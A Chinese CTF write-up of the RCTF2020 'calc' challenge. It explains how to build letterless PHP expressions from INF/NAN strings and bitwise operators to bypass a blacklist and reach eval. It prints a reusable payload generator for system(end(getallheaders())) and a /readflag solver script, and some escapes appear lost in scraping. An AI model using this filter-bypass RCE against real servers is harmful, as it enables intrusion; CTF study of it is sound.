php {0110 &^ 1011 =,从一道CTF题目中学习新的无字母webshell构造

最新推荐文章于 2023-03-01 19:50:14 发布
最新推荐文章于 2023-03-01 19:50:14 发布
阅读量307 收藏
点赞数
文章标签: php {0110 &^ 1011 =

207492

前言

前几天的RCTF2020中,有一道web题calc考察的是构造无字母的shell,非常有学习意义,这里跟各位师傅分享一下。本人菜鸟一枚,文章中如有不对的地方,望各位师傅指出,勿喷~~~

题目分析

error_reporting(0);

if(!isset($_GET['num'])){

show_source(__FILE__);

}else{

$str = $_GET['num'];

$blacklist = ['[a-z]', '[x7f-xff]', 's',"'", '"', '`', '[', ']','$', '_', '\\','^', ','];

foreach ($blacklist as $blackitem) {

if (preg_match('/' . $blackitem . '/im', $str)) {

die("what are you want to do?");

}

}

@eval('echo '.$str.';');

}

?>

题目只允许使用以下字符:

! # % & ( ) * + - / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ { | } ~

如何仅仅通过数字和一些可见字符,实现任意的php代码执行呢?这里运用到的,是关于.运算符的自动类型转换。

关于点运算符的自动类型转换

我们来看下面的例子:

@var_dump(1.0);//float(1)

@var_dump((1).(0));//string(2) "10"

@var_dump(strval(1).strval(0));//string(2) "10"

?>

在第2行,如果我们没有对数字加括号,php解析器就会将其视为float类型数值。

在第3行,如果对数字加上括号,由于运算符优先级规则,此时就变成两个数字进行.运算,php解析器会把两个数字自动转换成string类型,效果相当于使用strval函数。

而且,该自动类型转换不仅仅限于数字,看下面的例子:

@var_dump(a.(100));//string(4) "a100"

@var_dump(a0a.(aaa));//string(6) "a0aaaa"

@var_dump(_.a_1);//string(4) "_a_1"

?>

可以看到,只要不是php中有特定功能的字符,都可以通过这种方法将其转换成string。显然,这是我们需要在解题中利用的点。

但问题又来了,题目过滤了字母和常用字符,我们应该如何构造它们呢?看下面的例子:

@var_dump((1/0).(0));//string(4) "INF0"

@var_dump((0/0).(0));//string(4) "NAN0"

@var_dump((9999999999*9999999999).(0));//string(16) "9.999999998E+190"

@var_dump((3333/4).(0));//string(7) "833.250"

@$N = (((1/0).(0)){0});//string(1) "I"

@$N = (((1/0).(0)){1});//string(1) "N"

@$N = (((1/0).(0)){2});//string(1) "F"

?>

我们这里利用NAN、INF等特殊的数值表示,通过.运算符将其转换成string。至于元素的提取,虽然题目过滤了[],但是php还支持使用{}获取Array和String的元素。

通过这些特殊的数值表示,我们就有了一些初始字符,接下来就利用& | ~等没有被过滤的运算符,将需要的字符构造出来即可,这也是题目名calc的含义所在。

现在思路有了,接下来就愉快地拿flag吧!

做题过程

实现任意命令执行的方式有很多,我这里使用的是system(end(getallheaders())),然后在http包首部的最后添加任意键值,即可实现任意命令执行。(该思路借鉴于Y1ng师傅,已征得同意进行分享)

207492

运行根目录的/readflag,发现又是一道计算题,跟*ctf2019-mywebsql的一模一样,直接上脚本:

$d = array(

0 => array("pipe", "r"),

1 => array("pipe", "w"),

2 => array("file", "/tmp/error.log", "a")

);

$cwd = "/";

$env = array();

$process = proc_open("/readflag", $d, $pipes, $cwd, $env);

if (is_resource($process))

{

$d = fread($pipes[1], 1024);

$d = fread($pipes[1], 1024);

$d = explode("n", $d);

eval("$result = $d[0];");

eval("$result = $d[0];");

fwrite($pipes[0] , "$resultn");

var_dump(fread($pipes[1],1024));

var_dump(fread($pipes[1],1024));

var_dump(fread($pipes[1],1024));

fclose($pipes[0]);

fclose($pipes[1]);

$r = proc_close($process);

echo "result $rn";

}

?>

尝试上传文件,发现似乎没有写权限。将php代码进行base64编码,然后php -r执行即可拿到flag。

207492

exp

这里分享一下exp给各位师傅,脚本中所有可见字符的计算式都已经构造出来,师傅们只要在104行的$payload中输入要构造的php代码即可。

error_reporting(0);

$_00 = '((0).(0)){0}&((0/0).(1)){1}';//0000 0000

$_10 = '((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))';//0001 0000

$_20 = '(((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1})';//0010 0000 space

$_21 = '(((1).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0001 !

$_22 = '(((2).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0010 "

$_23 = '(((3).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0011 //

$_24 = '(((0/0).(1)){1}|((0).(4)){1})&(((3333/4).(0)){3})';//0010 0100 $

$_25 = '(((5).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0101 %

$_26 = '(((6).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0110 &

$_27 = '(((7).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 0111 '

$_28 = '(((8).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 1000 (

$_29 = '(((9).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12})';//0010 1001 )

$_2a = '((((8).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))|((((2).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))';//0010 1010 *

$_2b = '((9999999999*999999999).(0)){12}';//0010 1011 +

$_2c = '((((0/0).(1)){1}|((0).(4)){1})&(((3333/4).(0)){3}))|((((8).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))';//0010 1100 ,

$_2d = '((((0/0).(1)){1}|((0).(4)){1})&(((3333/4).(0)){3}))|((((9).(0)){0})&(((3333/4).(0)){3}|((9999999999*999999999).(0)){12}))';//0010 1101 -

$_2e = '((3333/4).(0)){3}';//0010 1110 .

$_2f = '((3333/4).(0)){3}|((9999999999*999999999).(0)){12}';//0010 1111 /

$_30 = '((0).(0)){0}';//0011 0000 0

$_31 = '((1).(0)){0}';//0011 0001 1

$_32 = '((2).(0)){0}';//0011 0010 2

$_33 = '((3).(0)){0}';//0011 0011 3

$_34 = '((4).(0)){0}';//0011 0100 4

$_35 = '((5).(0)){0}';//0011 0101 5

$_36 = '((6).(0)){0}';//0011 0110 6

$_37 = '((7).(0)){0}';//0011 0111 7

$_38 = '((8).(0)){0}';//0011 1000 8

$_39 = '((9).(0)){0}';//0011 1001 9

$_3a = '(((8).(0)){0})|(((2).(0)){0})';//0011 1010 :

$_3b = '(((8).(0)){0})|(((3).(0)){0})';//0011 1011 ;

$_3c = '(((8).(0)){0})|(((4).(0)){0})';//0011 1100 <

$_3d = '(((8).(0)){0})|(((5).(0)){0})';//0011 1101 =

$_3e = '(((8).(0)){0})|(((6).(0)){0})';//0011 1110 >

$_3f = '(((8).(0)){0})|(((7).(0)){0})';//0011 1111 ?

$_40 = '((0/0).(1)){1}&((0/0).(1)){0}';//0100 0000 @

$A = '((0/0).(1)){1}';//0100 0001 A

$B = '(((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))';//0100 0010 B

$C = '((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))))';//0100 0011 C

$D = '(((0/0).(1)){0}&((9999999999*999999999).(0)){11})';// 0100 0100 D

$E = '((9999999999*999999999).(0)){11}';//0100 0101 E

$F = '(((1/0).(0)){2})';//0100 0110 F

$G = '(((0/0).(1)){1})|(((1/0).(0)){2})';//0100 0111 G

$H = '((((1/0).(0)){0})&((0/0).(1)){0})';//0100 1000 H

$I = '(((1/0).(0)){0})';//0100 1001 I

$J = '((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1010 J

$K = '(((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))))|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1011 K

$L = '((((0/0).(1)){0}&((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1100 L

$M = '((((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0})))';//0100 1101 M

$N = '((0/0).(1)){0}';//0100 1110 N

$O = '((0/0).(1)){1}|((0/0).(1)){0}';//0100 1111 O

$P = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){1}&((0/0).(1)){0})';//0101 0001 P

$Q = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){1})';//0101 0001 Q

$R = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0})))';//0101 0010 R

$S = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0})))))';//0101 0011 S

$T = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((0/0).(1)){0}&((9999999999*999999999).(0)){11}))';//0101 0100 T

$U = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((9999999999*999999999).(0)){11})';//0101 0101 U

$V = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((1/0).(0)){2}))';//0101 0110 V

$W = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((0/0).(1)){1})|(((1/0).(0)){2}))';//0101 0111 W

$X = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((1/0).(0)){0})&((0/0).(1)){0}))';//0101 1000 X

$Y = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((1/0).(0)){0}))';//0101 1001 Y

$Z = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1010 Z

$_5b = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|(((((0/0).(1)){1})|((((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))&(((0/0).(1)){1}|((0/0).(1)){0}))))|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1011 [

$_5c = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((0/0).(1)){0}&((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1100

$_5d = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0}))))';//0101 1101 ]

$_5e = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){0})';//0101 1110 ^

$_5f = '(((((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~(((3333/4).(0)){3}|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})))|((0/0).(1)){1}|((0/0).(1)){0})';//0101 1111 _

$_60 = '(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0110 0000 `

$a = '(((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1}';//0110 0001 a

$b = '(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1})';//0110 0010 b

$c = '((((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))&(((0/0).(1)){1}|((0).(2)){1}))|((((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1})';//0110 0011 c

$d = '(((3333/4).(0)){3}|((0/0).(1)){1})&(((4).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0110 0100 d

$e = '((((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1})|(((9999999999*999999999).(0)){11})';//0110 0101 e

$f = '(((6).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 0110 f

$g = '(((0/0).(1)){1}|((0).(6)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 0111 g

$h = '(((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 1000 h

$i = '(((0/0).(1)){1}|((0).(9)){1})&(((3333/4).(0)){3}|((0/0).(1)){1})';//0110 1001 i

$j = '(((9999999999*999999999).(0)){12}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0110 1010 j

$k = '((9999999999*999999999).(0)){12}|((0/0).(1)){1}';//0110 1011 k

$l = '((((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1}))|((((3333/4).(0)){3}|((0/0).(1)){1})&(((4).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))))';//0110 1100 l

$m = '((((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))&(((3333/4).(0)){3}|((0/0).(1)){1}))|(((((0).(0)){0}|((0/0).(1)){1})&((3333/4).(0)){3}|((0/0).(1)){1})|(((9999999999*999999999).(0)){11}))';//0110 1101 m

$n = '((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})';//0110 1110 n

$o = '((3333/4).(0)){3}|((0/0).(1)){1}';//0110 1111 o

$p = '((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0000 p

$q = '((0).(0)){0}|((0/0).(1)){1}';//0111 0001 q

$r = '((2).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0010 r

$s = '((0/0).(1)){1}|((0).(2)){1}';//0111 0011

$t = '((4).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0100 t

$u = '((0/0).(1)){1}|((0).(4)){1}';//0111 0101

$v = '((6).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 0110 v

$w = '((0/0).(1)){1}|((0).(6)){1}';//0111 0111

$x = '((8).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0}))';//0111 1000 x

$y = '((0/0).(1)){1}|((0).(9)){1}';//0111 1001

$z = '((((9999999999*999999999).(0)){12}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))|(((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0111 1010 z

$_7b = '(((1/0).(0)){0}|(((((-1).(0)){0})|(((0/0).(0)){1}))&((((1).(0)){0})|(((999**999).(1)){2}))))&((4).(0)){0}';//0111 1011 {

$_7c = '(((((0/0).(1)){0}&((9999999999*999999999).(0)){11})|(((((1/0).(0)){0})&((0/0).(1)){0})))|((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0111 1100 |

$_7d = '((1).(2)){1}|((1/0).(0)){0}';//0111 1101 }

$_7e = '(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})|((0).(0)){0}|(((0).(0)){0}|((0/0).(1)){1})&(((((3333/4).(0)){3})&(((0).(0)){0}|((0/0).(1)){1}))|(((0/0).(1)){0})))';//0111 1110 ~

$_7f = '(((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1}';//0111 1111 7f

$_80 = '(((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&~((~(((0/0).(1)){1}&((0/0).(1)){0}))|((0/0).(1)){1}))|(~((((0/0).(1)){1}|((0).(9)){1})|((0).(6)){1})&((~(((0/0).(1)){1}&((0/0).(1)){0}))|((0/0).(1)){1}))';//1000 0000

$_ff = '(~(((0/0).(1)){1}&((0/0).(1)){0}))|((0/0).(1)){1}';//1111 1111 ff

$payload = 'system(end(getallheaders()))';

$result = "";

$flag = True;

for($aa = 0;$aa < strlen($payload);$aa++){

if(ord($payload[$aa])>=ord('a') && ord($payload[$aa])<=ord('z')){

if($flag === True){

$flag = False;

$result .= "(";

}

$result .= "((${$payload[$aa]})).";

}

elseif($payload[$aa] === "(" or $payload[$aa] === ")"){

if($flag === False){

$result = substr($result, 0, strlen($result)-1) . ")";

$flag = True;

}

if($result[strlen($result)-1] === "."){

$result = substr($result, 0, strlen($result)-1) . $payload[$aa];

}

else{

$result .= $payload[$aa];

}

}

else{

if($flag === False){

$result = substr($result, 0, strlen($result)-1) . ")";

$flag = True;

}

$tmp = "_".strval(dechex(ord($payload[$aa])));

$result .= "((${$tmp})).";

}

}

if ($result[strlen($result)-1] !== ")"){

$result = substr($result, 0, strlen($result)-1);

}

$result .= ";";

echo urlencode($result);

?>

哈里叔叔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
NISACTF 2022 writeup
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &amp;‮⁦+!!⁩⁦&amp; "‮⁦ Flag!.
一道简单题对php反序列化与命令执行的再认识——绿盟杯2021 flag在哪里
Mrs_H的博客
10-24 513
前言 最近做了很多比赛的题目,而且都是我认为学的不错的PHP反序列化题目。但结果却是被暴打,现在颖的题目类型,以及利用方法是都是我之前没有学到的。有些本应该会的题目也会因为粗心大意没有细心去解决问题。说多了,还是自己太菜了。咱们接下来上正菜。 正文 (以下的解题思路来自于末初大佬) 下面是题目的源代码 <?php error_reporting(0); <?php error_reporting(0); class begin{ public $file; public $mo
[GYCTF2020]Blacklist
weixin_43152809的博客
11-02 413
输入1或者2会返回一个数组 随后输入1’ union select 1,database()–+返回了过滤掉的语句 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 尝试报错注入: 输入 or extractvalue(1,concat(user(),0x7e,version())) 随后输入 1' and extractvalue(1,concat(
PHP命令执行集锦
蚁景网安学院
03-21 2353
代码审计总要遇到命令执行或者说RCE,打CTF的过程难免不会碰见,毕竟PHP是世界上最好的语言,总结一下...
狼组CTF WEB题 代码审计之代码注入
tempulcc的博客
09-02 658
献上源码 <?php show_source(__FILE__); error_reporting(0); $you = "you are ?"; extract($_POST); if($you != 'i am pig'){ echo '<img src="./Ding.gif">'."</br>"; die('Ding Ding Ding ~'); } $peiqi = ["y","eval","assert","print_r","system", "
一道CTF学习PHP反序列化漏洞-附件资源
03-02
一道CTF学习PHP反序列化漏洞-附件资源
CTFWeb各种题目的解题姿势PPT模板
02-21
CTFWeb各种题目的解题姿势PPT模板
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队有一个小伙伴电脑连不上局域网,只能从我电脑下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能出writeup的话,那就...
工控CTF协议分析学习题目合集
12-20
本资源“工控CTF协议分析学习题目合集”是针对工控安全爱好者和专业人员设计的学习资料,涵盖了多个工控协议的分析与实践题目,以辅助学习和提升技术水平。 首先,我们来看“1.Modbus”协议。Modbus是最广泛使用的...
PHP渗透测试题目笔记
Zeker62的博客
02-10 5536
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
php序列化和反序列化-ctf
时光凉春衫薄的博客
08-08 1124
<?php error_reporting(0); include "key4.php"; $TEMP = "Whatever is worth doing is worth doing well."; $str = $_GET['str']; if (unserialize($str) === $TEMP) { echo "$key4"; } show_source(__FILE__); 通过上述得知unserialize($str)反序列化后的值等于Whatever is worth.
BUUCTF(web刷题记录一)
nareku的博客
04-16 8712
前言 涨知识的一天 打开一看是简单计算器,随便输入看看 发现字母输入不了,查看源码 发现是在calc.php里面计算的,而且提示说存在Waf,这些字母应该就是Waf过滤的,访问calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' '
mysql %3cforeach_RCTF 2020 Writeup
weixin_29119497的博客
01-27 2320
来啦!今天也是活力满满的工作日小编WEBcalc解题思路error_reporting ( 0 );if(!isset( $_GET [ 'num' ])){show_source ( __FILE__ );}else{$str = $_GET [ 'num' ];$blacklist = [ '[a-z]' , '[\x7f-\xff]' , '\s' , "'" , '"' , ...
ctf刷题小结
quan9i的博客
05-15 6270
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
buu刷题(第一周)
qq_62046696的博客
03-01 790
create_function直接执行,里面是有eval所以需要让create_function的函数名()引用一下来执行,下面的是不可能爆破成功了,然后create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_[0-999]我们可以爆破。
D3CTF shellgen2 对无字母数字phpshell学习
weixin_45805993的博客
03-24 224
原题waf def waf(phpshell): if not phpshell.startswith(b'<?php'): return True phpshell = phpshell[6:] for c in phpshell: if c not in b'0-9$_;+[].=<?>': return True else: print(chr(c), end=''
PHP-CTF】无字母无数字webshell
尚未佩妥剑 转眼便江湖
10-31 8002
PHP字母数字构造Webshell 题目 index.php: &amp;lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&amp;gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
关于PHPwebshell免杀小结
小王的储物间
02-23 909
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数函数名、方法名、类名不区分大小,但推荐使用与定义时相同的名字的时候还可以使得大小进行绕过,所以大大提升了免杀效果!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
php 上传webshell,利用php自包含特性上传webshell
weixin_34396941的博客
03-10 644
0x00 前言今天做到一题道来自百度杯十二月第四场的ctf题,题目名字叫blog 进阶篇,当时没做出来,看了writeup才知道竟然还有这种骚操作来上传文件进行包含。0x01 题目复现前面的解题步骤是注册一个账号以后,在post.php页面提交留言内容,这里会有一个insert into注入,可以拿到管理员的密码。利用管理员账号登录上去以后会有一个文件包含点,在上级目录下有flag文件。正常的思...
这是一道 CTF 网络安全竞赛Web 题目题目进去就显示无网络连接
最新发布
05-21
这个题目的意思很可能是需要你在本地搭建一个与这个题目相同的网站,并且在本地进行漏洞分析和攻击。你可以先尝试在本地搭建一个与该题目相同的网站,并且使用浏览器访问,看看是否存在其他信息或者提示。如果还是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值